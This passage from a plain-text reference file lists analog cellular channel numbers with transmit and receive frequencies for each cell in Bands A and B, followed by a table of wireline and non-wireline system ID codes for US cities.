Channel 13 (67) Tx 872.010 Rx 827.010
Channel 14 (46) Tx 871.380 Rx 826.380
Channel 15 (25) Tx 870.750 Rx 825.750
Channel 16 (4) Tx 870.120 Rx 825.120

Cell # 16
--------------------------------------------------
Channel 1 (318) Tx 879.540 Rx 834.540
Channel 2 (297) Tx 878.910 Rx 833.910
Channel 3 (276) Tx 878.280 Rx 833.280
Channel 4 (255) Tx 877.650 Rx 832.650
Channel 5 (234) Tx 877.020 Rx 832.020
Channel 6 (213) Tx 876.390 Rx 831.390
Channel 7 (192) Tx 875.760 Rx 830.760
Channel 8 (171) Tx 875.130 Rx 830.130
Channel 9 (150) Tx 874.500 Rx 829.500
Channel 10 (129) Tx 873.870 Rx 828.870
Channel 11 (108) Tx 873.240 Rx 828.240
Channel 12 (87) Tx 872.610 Rx 827.610
Channel 13 (66) Tx 871.980 Rx 826.980
Channel 14 (45) Tx 871.350 Rx 826.350
Channel 15 (24) Tx 870.720 Rx 825.720
Channel 16 (3) Tx 870.090 Rx 825.090

Cell # 17
--------------------------------------------------
Channel 1 (317) Tx 879.510 Rx 834.510
Channel 2 (296) Tx 878.880 Rx 833.880
Channel 3 (275) Tx 878.250 Rx 833.250
Channel 4 (254) Tx 877.620 Rx 832.620
Channel 5 (233) Tx 876.990 Rx 831.990
Channel 6 (212) Tx 876.360 Rx 831.360
Channel 7 (191) Tx 875.730 Rx 830.730
Channel 8 (170) Tx 875.100 Rx 830.100
Channel 9 (149) Tx 874.470 Rx 829.470
Channel 10 (128) Tx 873.840 Rx 828.840
Channel 11 (107) Tx 873.210 Rx 828.210
Channel 12 (86) Tx 872.580 Rx 827.580
Channel 13 (65) Tx 871.950 Rx 826.950
Channel 14 (44) Tx 871.320 Rx 826.320
Channel 15 (23) Tx 870.690 Rx 825.690
Channel 16 (2) Tx 870.060 Rx 825.060

Cell # 18
--------------------------------------------------
Channel 1 (316) Tx 879.480 Rx 834.480
Channel 2 (295) Tx 878.850 Rx 833.850
Channel 3 (274) Tx 878.220 Rx 833.220
Channel 4 (253) Tx 877.590 Rx 832.590
Channel 5 (232) Tx 876.960 Rx 831.960
Channel 6 (211) Tx 876.330 Rx 831.330
Channel 7 (190) Tx 875.700 Rx 830.700
Channel 8 (169) Tx 875.070 Rx 830.070
Channel 9 (148) Tx 874.440 Rx 829.440
Channel 10 (127) Tx 873.810 Rx 828.810
Channel 11 (106) Tx 873.180 Rx 828.180
Channel 12 (85) Tx 872.550 Rx 827.550
Channel 13 (64) Tx 871.920 Rx 826.920
Channel 14 (43) Tx 871.290 Rx 826.290
Channel 15 (22) Tx 870.660 Rx 825.660
Channel 16 (1) Tx 870.030 Rx 825.030

Cell # 19
--------------------------------------------------
Channel 1 (315) Tx 879.450 Rx 834.450
Channel 2 (294) Tx 878.820 Rx 833.820
Channel 3 (273) Tx 878.190 Rx 833.190
Channel 4 (252) Tx 877.560 Rx 832.560
Channel 5 (231) Tx 876.930 Rx 831.930
Channel 6 (210) Tx 876.300 Rx 831.300
Channel 7 (189) Tx 875.670 Rx 830.670
Channel 8 (168) Tx 875.040 Rx 830.040
Channel 9 (147) Tx 874.410 Rx 829.410
Channel 10 (126) Tx 873.780 Rx 828.780
Channel 11 (105) Tx 873.150 Rx 828.150
Channel 12 (84) Tx 872.520 Rx 827.520
Channel 13 (63) Tx 871.890 Rx 826.890
Channel 14 (42) Tx 871.260 Rx 826.260
Channel 15 (21) Tx 870.630 Rx 825.630

Cell # 20
--------------------------------------------------
Channel 1 (314) Tx 879.420 Rx 834.420
Channel 2 (293) Tx 878.790 Rx 833.790
Channel 3 (272) Tx 878.160 Rx 833.160
Channel 4 (251) Tx 877.530 Rx 832.530
Channel 5 (230) Tx 876.900 Rx 831.900
Channel 6 (209) Tx 876.270 Rx 831.270
Channel 7 (188) Tx 875.640 Rx 830.640
Channel 8 (167) Tx 875.010 Rx 830.010
Channel 9 (146) Tx 874.380 Rx 829.380
Channel 10 (125) Tx 873.750 Rx 828.750
Channel 11 (104) Tx 873.120 Rx 828.120
Channel 12 (83) Tx 872.490 Rx 827.490
Channel 13 (62) Tx 871.860 Rx 826.860
Channel 14 (41) Tx 871.230 Rx 826.230
Channel 15 (20) Tx 870.600 Rx 825.600

Cell # 21
--------------------------------------------------
Channel 1 (313) Tx 879.390 Rx 834.390
Channel 2 (292) Tx 878.760 Rx 833.760
Channel 3 (271) Tx 878.130 Rx 833.130
Channel 4 (250) Tx 877.500 Rx 832.500
Channel 5 (229) Tx 876.870 Rx 831.870
Channel 6 (208) Tx 876.240 Rx 831.240
Channel 7 (187) Tx 875.610 Rx 830.610
Channel 8 (166) Tx 874.980 Rx 829.980
Channel 9 (145) Tx 874.350 Rx 829.350
Channel 10 (124) Tx 873.720 Rx 828.720
Channel 11 (103) Tx 873.090 Rx 828.090
Channel 12 (82) Tx 872.460 Rx 827.460
Channel 13 (61) Tx 871.830 Rx 826.830
Channel 14 (40) Tx 871.200 Rx 826.200
Channel 15 (19) Tx 870.570 Rx 825.570

**************************************************

BAND B

Cell # 1
--------------------------------------------------
Channel 1       (334)   Tx 880.020      Rx 835.020
Channel 2 (355) Tx 880.650 Rx 835.650
Channel 3 (376) Tx 881.280 Rx 836.280
Channel 4 (397) Tx 881.910 Rx 836.910
Channel 5 (418) Tx 882.540 Rx 837.540
Channel 6 (439) Tx 883.170 Rx 838.170
Channel 7 (460) Tx 883.800 Rx 838.800
Channel 8 (481) Tx 884.430 Rx 839.430
Channel 9 (502) Tx 885.060 Rx 840.060
Channel 10 (523) Tx 885.690 Rx 840.690
Channel 11 (544) Tx 886.320 Rx 841.320
Channel 12 (565) Tx 886.950 Rx 841.950
Channel 13 (586) Tx 887.580 Rx 842.580
Channel 14 (607) Tx 888.210 Rx 843.210
Channel 15 (628) Tx 888.840 Rx 843.840
Channel 16 (649) Tx 889.470 Rx 844.470

Cell # 2
--------------------------------------------------
Channel 1 (335) Tx 880.050 Rx 835.050
Channel 2 (356) Tx 880.680 Rx 835.680
Channel 3 (377) Tx 881.310 Rx 836.310
Channel 4 (398) Tx 881.940 Rx 836.940
Channel 5 (419) Tx 882.570 Rx 837.570
Channel 6 (440) Tx 883.200 Rx 838.200
Channel 7 (461) Tx 883.830 Rx 838.830
Channel 8 (482) Tx 884.460 Rx 839.460
Channel 9 (503) Tx 885.090 Rx 840.090
Channel 10 (524) Tx 885.720 Rx 840.720
Channel 11 (545) Tx 886.350 Rx 841.350
Channel 12 (566) Tx 886.980 Rx 841.980
Channel 13 (587) Tx 887.610 Rx 842.610
Channel 14 (608) Tx 888.240 Rx 843.240
Channel 15 (629) Tx 888.870 Rx 843.870
Channel 16 (650) Tx 889.500 Rx 844.500

Cell # 3
--------------------------------------------------
Channel 1 (336) Tx 880.080 Rx 835.080
Channel 2 (357) Tx 880.710 Rx 835.710
Channel 3 (378) Tx 881.340 Rx 836.340
Channel 4 (399) Tx 881.970 Rx 836.970
Channel 5 (420) Tx 882.600 Rx 837.600
Channel 6 (441) Tx 883.230 Rx 838.230
Channel 7 (462) Tx 883.860 Rx 838.860
Channel 8 (483) Tx 884.490 Rx 839.490
Channel 9 (504) Tx 885.120 Rx 840.120
Channel 10 (525) Tx 885.750 Rx 840.750
Channel 11 (546) Tx 886.380 Rx 841.380
Channel 12 (567) Tx 887.010 Rx 842.010
Channel 13 (588) Tx 887.640 Rx 842.640
Channel 14 (609) Tx 888.270 Rx 843.270
Channel 15 (630) Tx 888.900 Rx 843.900
Channel 16 (651) Tx 889.530 Rx 844.530

Cell # 4
--------------------------------------------------
Channel 1 (337) Tx 880.110 Rx 835.110
Channel 2 (358) Tx 880.740 Rx 835.740
Channel 3 (379) Tx 881.370 Rx 836.370
Channel 4 (400) Tx 882.000 Rx 837.000
Channel 5 (421) Tx 882.630 Rx 837.630
Channel 6 (442) Tx 883.260 Rx 838.260
Channel 7 (463) Tx 883.890 Rx 838.890
Channel 8 (484) Tx 884.520 Rx 839.520
Channel 9 (505) Tx 885.150 Rx 840.150
Channel 10 (526) Tx 885.780 Rx 840.780
Channel 11 (547) Tx 886.410 Rx 841.410
Channel 12 (568) Tx 887.040 Rx 842.040
Channel 13 (589) Tx 887.670 Rx 842.670
Channel 14 (610) Tx 888.300 Rx 843.300
Channel 15 (631) Tx 888.930 Rx 843.930
Channel 16 (652) Tx 889.560 Rx 844.560

Cell # 5
--------------------------------------------------
Channel 1 (338) Tx 880.140 Rx 835.140
Channel 2 (359) Tx 880.770 Rx 835.770
Channel 3 (380) Tx 881.400 Rx 836.400
Channel 4 (401) Tx 882.030 Rx 837.030
Channel 5 (422) Tx 882.660 Rx 837.660
Channel 6 (443) Tx 883.290 Rx 838.290
Channel 7 (464) Tx 883.920 Rx 838.920
Channel 8 (485) Tx 884.550 Rx 839.550
Channel 9 (506) Tx 885.180 Rx 840.180
Channel 10 (527) Tx 885.810 Rx 840.810
Channel 11 (548) Tx 886.440 Rx 841.440
Channel 12 (569) Tx 887.070 Rx 842.070
Channel 13 (590) Tx 887.700 Rx 842.700
Channel 14 (611) Tx 888.330 Rx 843.330
Channel 15 (632) Tx 888.960 Rx 843.960
Channel 16 (653) Tx 889.590 Rx 844.590

Cell # 6
--------------------------------------------------
Channel 1 (339) Tx 880.170 Rx 835.170
Channel 2 (360) Tx 880.800 Rx 835.800
Channel 3 (381) Tx 881.430 Rx 836.430
Channel 4 (402) Tx 882.060 Rx 837.060
Channel 5 (423) Tx 882.690 Rx 837.690
Channel 6 (444) Tx 883.320 Rx 838.320
Channel 7 (465) Tx 883.950 Rx 838.950
Channel 8 (486) Tx 884.580 Rx 839.580
Channel 9 (507) Tx 885.210 Rx 840.210
Channel 10 (528) Tx 885.840 Rx 840.840
Channel 11 (549) Tx 886.470 Rx 841.470
Channel 12 (570) Tx 887.100 Rx 842.100
Channel 13 (591) Tx 887.730 Rx 842.730
Channel 14 (612) Tx 888.360 Rx 843.360
Channel 15 (633) Tx 888.990 Rx 843.990
Channel 16 (654) Tx 889.620 Rx 844.620

Cell # 7
--------------------------------------------------
Channel 1 (340) Tx 880.200 Rx 835.200
Channel 2 (361) Tx 880.830 Rx 835.830
Channel 3 (382) Tx 881.460 Rx 836.460
Channel 4 (403) Tx 882.090 Rx 837.090
Channel 5 (424) Tx 882.720 Rx 837.720
Channel 6 (445) Tx 883.350 Rx 838.350
Channel 7 (466) Tx 883.980 Rx 838.980
Channel 8 (487) Tx 884.610 Rx 839.610
Channel 9 (508) Tx 885.240 Rx 840.240
Channel 10 (529) Tx 885.870 Rx 840.870
Channel 11 (550) Tx 886.500 Rx 841.500
Channel 12 (571) Tx 887.130 Rx 842.130
Channel 13 (592) Tx 887.760 Rx 842.760
Channel 14 (613) Tx 888.390 Rx 843.390
Channel 15 (634) Tx 889.020 Rx 844.020
Channel 16 (655) Tx 889.650 Rx 844.650

Cell # 8
--------------------------------------------------
Channel 1 (341) Tx 880.230 Rx 835.230
Channel 2 (362) Tx 880.860 Rx 835.860
Channel 3 (383) Tx 881.490 Rx 836.490
Channel 4 (404) Tx 882.120 Rx 837.120
Channel 5 (425) Tx 882.750 Rx 837.750
Channel 6 (446) Tx 883.380 Rx 838.380
Channel 7 (467) Tx 884.010 Rx 839.010
Channel 8 (488) Tx 884.640 Rx 839.640
Channel 9 (509) Tx 885.270 Rx 840.270
Channel 10 (530) Tx 885.900 Rx 840.900
Channel 11 (551) Tx 886.530 Rx 841.530
Channel 12 (572) Tx 887.160 Rx 842.160
Channel 13 (593) Tx 887.790 Rx 842.790
Channel 14 (614) Tx 888.420 Rx 843.420
Channel 15 (635) Tx 889.050 Rx 844.050
Channel 16 (656) Tx 889.680 Rx 844.680

Cell # 9
--------------------------------------------------
Channel 1 (342) Tx 880.260 Rx 835.260
Channel 2 (363) Tx 880.890 Rx 835.890
Channel 3 (384) Tx 881.520 Rx 836.520
Channel 4 (405) Tx 882.150 Rx 837.150
Channel 5 (426) Tx 882.780 Rx 837.780
Channel 6 (447) Tx 883.410 Rx 838.410
Channel 7 (468) Tx 884.040 Rx 839.040
Channel 8 (489) Tx 884.670 Rx 839.670
Channel 9 (510) Tx 885.300 Rx 840.300
Channel 10 (531) Tx 885.930 Rx 840.930
Channel 11 (552) Tx 886.560 Rx 841.560
Channel 12 (573) Tx 887.190 Rx 842.190
Channel 13 (594) Tx 887.820 Rx 842.820
Channel 14 (615) Tx 888.450 Rx 843.450
Channel 15 (636) Tx 889.080 Rx 844.080
Channel 16 (657) Tx 889.710 Rx 844.710

Cell # 10
--------------------------------------------------
Channel 1 (343) Tx 880.290 Rx 835.290
Channel 2 (364) Tx 880.920 Rx 835.920
Channel 3 (385) Tx 881.550 Rx 836.550
Channel 4 (406) Tx 882.180 Rx 837.180
Channel 5 (427) Tx 882.810 Rx 837.810
Channel 6 (448) Tx 883.440 Rx 838.440
Channel 7 (469) Tx 884.070 Rx 839.070
Channel 8 (490) Tx 884.700 Rx 839.700
Channel 9 (511) Tx 885.330 Rx 840.330
Channel 10 (532) Tx 885.960 Rx 840.960
Channel 11 (553) Tx 886.590 Rx 841.590
Channel 12 (574) Tx 887.220 Rx 842.220
Channel 13 (595) Tx 887.850 Rx 842.850
Channel 14 (616) Tx 888.480 Rx 843.480
Channel 15 (637) Tx 889.110 Rx 844.110
Channel 16 (658) Tx 889.740 Rx 844.740

Cell # 11
--------------------------------------------------
Channel 1 (344) Tx 880.320 Rx 835.320
Channel 2 (365) Tx 880.950 Rx 835.950
Channel 3 (386) Tx 881.580 Rx 836.580
Channel 4 (407) Tx 882.210 Rx 837.210
Channel 5 (428) Tx 882.840 Rx 837.840
Channel 6 (449) Tx 883.470 Rx 838.470
Channel 7 (470) Tx 884.100 Rx 839.100
Channel 8 (491) Tx 884.730 Rx 839.730
Channel 9 (512) Tx 885.360 Rx 840.360
Channel 10 (533) Tx 885.990 Rx 840.990
Channel 11 (554) Tx 886.620 Rx 841.620
Channel 12 (575) Tx 887.250 Rx 842.250
Channel 13 (596) Tx 887.880 Rx 842.880
Channel 14 (617) Tx 888.510 Rx 843.510
Channel 15 (638) Tx 889.140 Rx 844.140
Channel 16 (659) Tx 889.770 Rx 844.770

Cell # 12
--------------------------------------------------
Channel 1 (345) Tx 880.350 Rx 835.350
Channel 2 (366) Tx 880.980 Rx 835.980
Channel 3 (387) Tx 881.610 Rx 836.610
Channel 4 (408) Tx 882.240 Rx 837.240
Channel 5 (429) Tx 882.870 Rx 837.870
Channel 6 (450) Tx 883.500 Rx 838.500
Channel 7 (471) Tx 884.130 Rx 839.130
Channel 8 (492) Tx 884.760 Rx 839.760
Channel 9 (513) Tx 885.390 Rx 840.390
Channel 10 (534) Tx 886.020 Rx 841.020
Channel 11 (555) Tx 886.650 Rx 841.650
Channel 12 (576) Tx 887.280 Rx 842.280
Channel 13 (597) Tx 887.910 Rx 842.910
Channel 14 (618) Tx 888.540 Rx 843.540
Channel 15 (639) Tx 889.170 Rx 844.170
Channel 16 (660) Tx 889.800 Rx 844.800

Cell # 13
--------------------------------------------------
Channel 1 (346) Tx 880.380 Rx 835.380
Channel 2 (367) Tx 881.010 Rx 836.010
Channel 3 (388) Tx 881.640 Rx 836.640
Channel 4 (409) Tx 882.270 Rx 837.270
Channel 5 (430) Tx 882.900 Rx 837.900
Channel 6 (451) Tx 883.530 Rx 838.530
Channel 7 (472) Tx 884.160 Rx 839.160
Channel 8 (493) Tx 884.790 Rx 839.790
Channel 9 (514) Tx 885.420 Rx 840.420
Channel 10 (535) Tx 886.050 Rx 841.050
Channel 11 (556) Tx 886.680 Rx 841.680
Channel 12 (577) Tx 887.310 Rx 842.310
Channel 13 (598) Tx 887.940 Rx 842.940
Channel 14 (619) Tx 888.570 Rx 843.570
Channel 15 (640) Tx 889.200 Rx 844.200
Channel 16 (661) Tx 889.830 Rx 844.830

Cell # 14
--------------------------------------------------
Channel 1 (347) Tx 880.410 Rx 835.410
Channel 2 (368) Tx 881.040 Rx 836.040
Channel 3 (389) Tx 881.670 Rx 836.670
Channel 4 (410) Tx 882.300 Rx 837.300
Channel 5 (431) Tx 882.930 Rx 837.930
Channel 6 (452) Tx 883.560 Rx 838.560
Channel 7 (473) Tx 884.190 Rx 839.190
Channel 8 (494) Tx 884.820 Rx 839.820
Channel 9 (515) Tx 885.450 Rx 840.450
Channel 10 (536) Tx 886.080 Rx 841.080
Channel 11 (557) Tx 886.710 Rx 841.710
Channel 12 (578) Tx 887.340 Rx 842.340
Channel 13 (599) Tx 887.970 Rx 842.970
Channel 14 (620) Tx 888.600 Rx 843.600
Channel 15 (641) Tx 889.230 Rx 844.230
Channel 16 (662) Tx 889.860 Rx 844.860

Cell # 15
--------------------------------------------------
Channel 1 (348) Tx 880.440 Rx 835.440
Channel 2 (369) Tx 881.070 Rx 836.070
Channel 3 (390) Tx 881.700 Rx 836.700
Channel 4 (411) Tx 882.330 Rx 837.330
Channel 5 (432) Tx 882.960 Rx 837.960
Channel 6 (453) Tx 883.590 Rx 838.590
Channel 7 (474) Tx 884.220 Rx 839.220
Channel 8 (495) Tx 884.850 Rx 839.850
Channel 9 (516) Tx 885.480 Rx 840.480
Channel 10 (537) Tx 886.110 Rx 841.110
Channel 11 (558) Tx 886.740 Rx 841.740
Channel 12 (579) Tx 887.370 Rx 842.370
Channel 13 (600) Tx 888.000 Rx 843.000
Channel 14 (621) Tx 888.630 Rx 843.630
Channel 15 (642) Tx 889.260 Rx 844.260
Channel 16 (663) Tx 889.890 Rx 844.890

Cell # 16
--------------------------------------------------
Channel 1 (349) Tx 880.470 Rx 835.470
Channel 2 (370) Tx 881.100 Rx 836.100
Channel 3 (391) Tx 881.730 Rx 836.730
Channel 4 (412) Tx 882.360 Rx 837.360
Channel 5 (433) Tx 882.990 Rx 837.990
Channel 6 (454) Tx 883.620 Rx 838.620
Channel 7 (475) Tx 884.250 Rx 839.250
Channel 8 (496) Tx 884.880 Rx 839.880
Channel 9 (517) Tx 885.510 Rx 840.510
Channel 10 (538) Tx 886.140 Rx 841.140
Channel 11 (559) Tx 886.770 Rx 841.770
Channel 12 (580) Tx 887.400 Rx 842.400
Channel 13 (601) Tx 888.030 Rx 843.030
Channel 14 (622) Tx 888.660 Rx 843.660
Channel 15 (643) Tx 889.290 Rx 844.290
Channel 16 (664) Tx 889.920 Rx 844.920

Cell # 17
--------------------------------------------------
Channel 1 (350) Tx 880.500 Rx 835.500
Channel 2 (371) Tx 881.130 Rx 836.130
Channel 3 (392) Tx 881.760 Rx 836.760
Channel 4 (413) Tx 882.390 Rx 837.390
Channel 5 (434) Tx 883.020 Rx 838.020
Channel 6 (455) Tx 883.650 Rx 838.650
Channel 7 (476) Tx 884.280 Rx 839.280
Channel 8 (497) Tx 884.910 Rx 839.910
Channel 9 (518) Tx 885.540 Rx 840.540
Channel 10 (539) Tx 886.170 Rx 841.170
Channel 11 (560) Tx 886.800 Rx 841.800
Channel 12 (581) Tx 887.430 Rx 842.430
Channel 13 (602) Tx 888.060 Rx 843.060
Channel 14 (623) Tx 888.690 Rx 843.690
Channel 15 (644) Tx 889.320 Rx 844.320
Channel 16 (665) Tx 889.950 Rx 844.950

Cell # 18
--------------------------------------------------
Channel 1 (351) Tx 880.530 Rx 835.530
Channel 2 (372) Tx 881.160 Rx 836.160
Channel 3 (393) Tx 881.790 Rx 836.790
Channel 4 (414) Tx 882.420 Rx 837.420
Channel 5 (435) Tx 883.050 Rx 838.050
Channel 6 (456) Tx 883.680 Rx 838.680
Channel 7 (477) Tx 884.310 Rx 839.310
Channel 8 (498) Tx 884.940 Rx 839.940
Channel 9 (519) Tx 885.570 Rx 840.570
Channel 10 (540) Tx 886.200 Rx 841.200
Channel 11 (561) Tx 886.830 Rx 841.830
Channel 12 (582) Tx 887.460 Rx 842.460
Channel 13 (603) Tx 888.090 Rx 843.090
Channel 14 (624) Tx 888.720 Rx 843.720
Channel 15 (645) Tx 889.350 Rx 844.350
Channel 16 (666) Tx 889.980 Rx 844.980

Cell # 19
--------------------------------------------------
Channel 1 (352) Tx 880.560 Rx 835.560
Channel 2 (373) Tx 881.190 Rx 836.190
Channel 3 (394) Tx 881.820 Rx 836.820
Channel 4 (415) Tx 882.450 Rx 837.450
Channel 5 (436) Tx 883.080 Rx 838.080
Channel 6 (457) Tx 883.710 Rx 838.710
Channel 7 (478) Tx 884.340 Rx 839.340
Channel 8 (499) Tx 884.970 Rx 839.970
Channel 9 (520) Tx 885.600 Rx 840.600
Channel 10 (541) Tx 886.230 Rx 841.230
Channel 11 (562) Tx 886.860 Rx 841.860
Channel 12 (583) Tx 887.490 Rx 842.490
Channel 13 (604) Tx 888.120 Rx 843.120
Channel 14 (625) Tx 888.750 Rx 843.750
Channel 15 (646) Tx 889.380 Rx 844.380

Cell # 20
--------------------------------------------------
Channel 1 (353) Tx 880.590 Rx 835.590
Channel 2 (374) Tx 881.220 Rx 836.220
Channel 3 (395) Tx 881.850 Rx 836.850
Channel 4 (416) Tx 882.480 Rx 837.480
Channel 5 (437) Tx 883.110 Rx 838.110
Channel 6 (458) Tx 883.740 Rx 838.740
Channel 7 (479) Tx 884.370 Rx 839.370
Channel 8 (500) Tx 885.000 Rx 840.000
Channel 9 (521) Tx 885.630 Rx 840.630
Channel 10 (542) Tx 886.260 Rx 841.260
Channel 11 (563) Tx 886.890 Rx 841.890
Channel 12 (584) Tx 887.520 Rx 842.520
Channel 13 (605) Tx 888.150 Rx 843.150
Channel 14 (626) Tx 888.780 Rx 843.780
Channel 15 (647) Tx 889.410 Rx 844.410

Cell # 21
--------------------------------------------------
Channel 1 (354) Tx 880.620 Rx 835.620
Channel 2 (375) Tx 881.250 Rx 836.250
Channel 3 (396) Tx 881.880 Rx 836.880
Channel 4 (417) Tx 882.510 Rx 837.510
Channel 5 (438) Tx 883.140 Rx 838.140
Channel 6 (459) Tx 883.770 Rx 838.770
Channel 7 (480) Tx 884.400 Rx 839.400
Channel 8 (501) Tx 885.030 Rx 840.030
Channel 9 (522) Tx 885.660 Rx 840.660
Channel 10 (543) Tx 886.290 Rx 841.290
Channel 11 (564) Tx 886.920 Rx 841.920
Channel 12 (585) Tx 887.550 Rx 842.550
Channel 13 (606) Tx 888.180 Rx 843.180
Channel 14 (627) Tx 888.810 Rx 843.810
Channel 15 (648) Tx 889.440 Rx 844.440



SIDH CODES

CITY                    NON
                   WIRELINE   WIRELINE

Abaline, TX             131     422
Aiken, GA               181     084
Akron, OH               073     054
Albany, GA              241     204
Albany, NY              063     078
Alburqueque, NM         079     110
Alexandria, VA          243     212
Allentown, PA           103     008
Alton, IL               017     046
Altoona, PA             247     032
Amarillo, TX            249     422
Anchorage, AK           251     234
Anderson, SC            139     116
Anniston, AL            255     098
Appleton, WI            217     240
Asheville, NC           263     246
Ashland, WV             307     xxx
Athens, AL              203     198
Athens, GA              041     034
Atlanta, GA             041     034
Atlantic City, NJ       267     250
Augusta, GA             181     084
Aurora, IL              001     020
Austin, TX              107     164
Bakersfield, CA         183     228
Baltimore, MD           013     018
Bangor, ME              271     254
Baton Rouge, LA         085     106
Battle Creek, MI        403     256
Beaumont, TX            185     012
Bellingham, WA          047     006
Beloit, WI              217     210
Benton Harbor, MI       277     260
Biddeford, ME           501     484
Billings, MT            279     262
Biloxi, MS              281     264
Binghampton, NY         283     266
Birmingham, AL          113     098
Bishop, CA              1063    xxx
Bismark, ND             285     268
Bloomington, IL         455     532
Boise, ID               289     272
Boston, MA              007     028
Bradenton, FL           175     042
Bremerton, WA           047     006
Bridgeport, CT          119     088
Bristol, TN             149     042
Brownsville, TX         451     434
Bryan, TX               297     280
Buffalo, NY             003     056
Burlington, NC          069     144
Burlington, VT          313     300
Canton, OH              073     054
Casper, WY              301     284
Cedar Falls, IA         589     568
Cedar Rapids, IA        303     286
Champaign, IL           305     532
Charleston, WV          307     290
Charleston, SC          127     156
Charlotte, NC           139     114
Charlottesville, VA     309     292
Chattanooga, TN         161     148
Chicago, IL             001     020
Cincinatti, OH          051     014
Clarksville, TN         179     296
Cleveland, OH           015     054
College Station, TX     297     280
Colorado Springs, CO    045     180
Columbia, SC            189     182
Columbus, GA            319     302
Columbus, OH            133     138
Corpus Christi, TX      191     184
Council BLuffs, IA      137     152
Cumberland, MD          321     304
Dallas, TX              033     038
Danville, VA            323     306
Davenport, IA           193     186
Dayton, OH              163     134
Daytona Beach, FL       325     308
Decatur, IL             327     532
Dennison, TX            033     038
Denver, CO              045     058
Des Moines, IA          195     150
Detroit, MI             021     010
Dotham, AL              329     312
Dubuque, IA             331     314
Duluth, MN              333     316
Durham, NC              069     144
Eau Claire, WI          335     318
Elgin, IL               001     020
El Paso, TX             097     092
Elkhart, IN             549     530
Elmira, NY              283     266
Enid, OK                341     324
Erie, PA                343     326
Eugene, OR              061     328
Evansville, IN          197     190
Fairbanks, AK           ---     1018
Fargo, ND               347     330
Fayettesville, NC       349     100
Fayettesville, AR       607     342
Flint, MI               021     010
Florence, AL            351     334
Florence, SC            377     350
Fort Collins, CO        045     336
Fort Lauderdale, FL     037     024
Fort Myers, FL          355     042
Fort Pierce, FL         037     340
Fort Smith, AR          359     342
Fort Walton Beach, FL   361     344
Fort Wayne, IN          199     080
Fort Worth, TX          033     038
Fresno, CA              153     162
Gainesville, FL         365     348
Gadsden, AL             363     098
Galveston, TX           367     012
Glens Falls, NY         063     078
Grand Forks, ND         371     356
Grand Rapids, MI        021     244
Granite City, IL        017     046
Great Falls, MT         373     358
Greeley, CO             045     360
Green Bay, WI           217     362
Greensboro, NC          095     142
Greenville, SC          139     116
Gulf of Mexico, LA      171     194
Gulfport, MS            ---     264
Gunterville, AL         203     198
Hagerstown, MD          381     364
Hamilton, OH            383     366
Harlingen, TX           451     434
Harrisburg, PA          159     096
Hartford, CT            119     088
Hickory, NC             385     368
Hilo, HI                1161    060
Holbrook, AZ            1027    ---
Honolulu, HI            167     060
Houma, LA               387     370
Houston, TX             035     012
Huntington, WV          307     196
Huntsville, AL          203     198
Indianapolis, IN        019     080
Iowa City, IA           389     286
Jackson, MI             391     374
Jackson, MS             205     160
Jacksonville, FL        075     136
Jacksonville, NC        393     376
Janesville, WI          217     210
Jerseyville, IL         245     586
Johnson City, TN        149     074
Johnstown, PA           039     032
Joliet, IL              001     020
Joplin, MO              401     384
Juneau, AK              ---     1022
Kalamazoo, MI           403     386
Kankakee, IL            001     020
Kansas City, MO         059     052
Kennewick, WA           ---     500
Killeen, TX             409     392
Kingsport, TN           149     074
Knoxville, TN           093     104
Kokomo, IN              411     080
LaCross, WI             413     396
Lafayette, IN           415     080
Lafayette, LA           431     414
Lake Charkes, LA        417     400
Lakeland, FL            175     042
Lancaster, PA           159     096
Lansing, MI             021     188
Laredo, TX              419     402
Las Cruces, NM          097     404
Las Vegas, NV           211     064
Lawrence, KS            059     406
Lawton, OK              425     408
Lewiston, ME            427     482
Lexington, KY           213     206
Lihue, HI               1157    060
Lincoln, NE             433     416
Little Rock, AR         215     208
Longview, TX            229     418
Lorain, OH              437     054
Los Angeles, CA         027     002
Louisville, KY          065     076
Lubbock, TX             439     422
Lynchburg, VA           441     424
Macon, GA               443     426
Madison, WI             217     210
Manchester, NH          445     428
Mansfield, OH           447     430
Marshall, TX            229     418
McAllen, TX             451     434
Medford, OR             061     436
Melbourne, FL           175     068
Memphis, TN             143     062
Miami, FL               037     024
Midland, TX             459     422
Millville, NH           ---     250
Milwaukee, WI           005     044
Minneapolis, MN         023     026
Mobile, AL              081     120
Modesto, CA             233     224
Moline, IL              193     186
Monroe, LA              463     440
Monterey, CA            527     126
Montgomery, AL          465     444
Moorehead, ND           ---     330
Muncie, IN              467     080
Muskegon, MI            021     448
Nashua, NH              445     428
Nashville, TN           179     118
New Bedford, MA         119     028
New Brunswick, NY       173     022
New Haven, CT           119     088
New Orleans, LA         057     036
Newport News, VA        083     168
New York, NY            025     022
Norfolk, VA             083     168
Ocala, FL               473     348
Odessa, TX              475     422
Oklahoma City, OK       169     146
Olympia, WA             047     006
Omaha, NE               137     152
Orange County, NY       479     486
Orlando, FL             175     068
Ottawa, IL              1177    1178
Oxnard, CA              027     002
Panama City, FL         483     462
Parkersburg, WV         485     032
Pascagoula, MS          487     264
Pasco, WA               ---     500
Pensacola, FL           361     120
Peoria, IL              221     214
Petaluma, CA            031     040
Petersburg, VA          071     472
Philadelphia, PA        029     008
Phoenix, AZ             053     048
Pine Bluff, AR          493     208
Pittsburg, PA           039     032
Pittsfield, MA          119     480
Placerville, CA         ---     1080
Ponce, PR               497     082
Portland, ME            499     482
Portland, OR            061     030
Portsmouth, NH          501     484
Poughkeepsie, NY        503     486
Providence, RI          119     028
Provo, UT               091     488
Pueblo, CO              045     490
Raleigh, NC             069     144
Rapid City, SD          511     494
Reading, PA             103     008
Redding, CA             513     294
Reno, NV                515     498
Richland, WA            517     500
Richmond, VA            071     170
Roanoke, VA             519     502
Rochester, NH           501     484
Rochester, MN           521     504
Rochester, NY           117     154
Rockford, IL            217     506
Sacramento, CA          129     112
Saginaw, MI             021     389
Salem, OR               061     030
Salinas, CA             527     040
Salt Lake City, UT      091     094
San Angelo, TX          529     510
San Antonio, TX         151     122
San Deigo, CA           043     004
San Francisco, CA       031     040
San Jose, CA            031     040
San Juan, PR            227     218
Santa Barbara, CA       531     040
Santa Cruz, CA          031     126
Santa Rosa, CA          031     040
Sarasota, FL            175     142
Savanna, GA             539     520
Schenectady, NY         063     078
Scranton, PA            103     172
Seattle, WA             047     006
Sharon, PA              089     126
Sheboygan, WI           543     044
Shreveport, LA          229     220
Sioux City, IA          547     528
Sioux Falls, SD         555     540
South Bend, IA          549     530
Spartanburg, SC         139     116
Spokane, WA             231     222
Springfield, IL         551     532
Springfield, MO         559     546
Springfield, OH         573     134
Springfield, MA         119     188
St. Cloud, MN           553     534
St. Joseph, MO          059     536
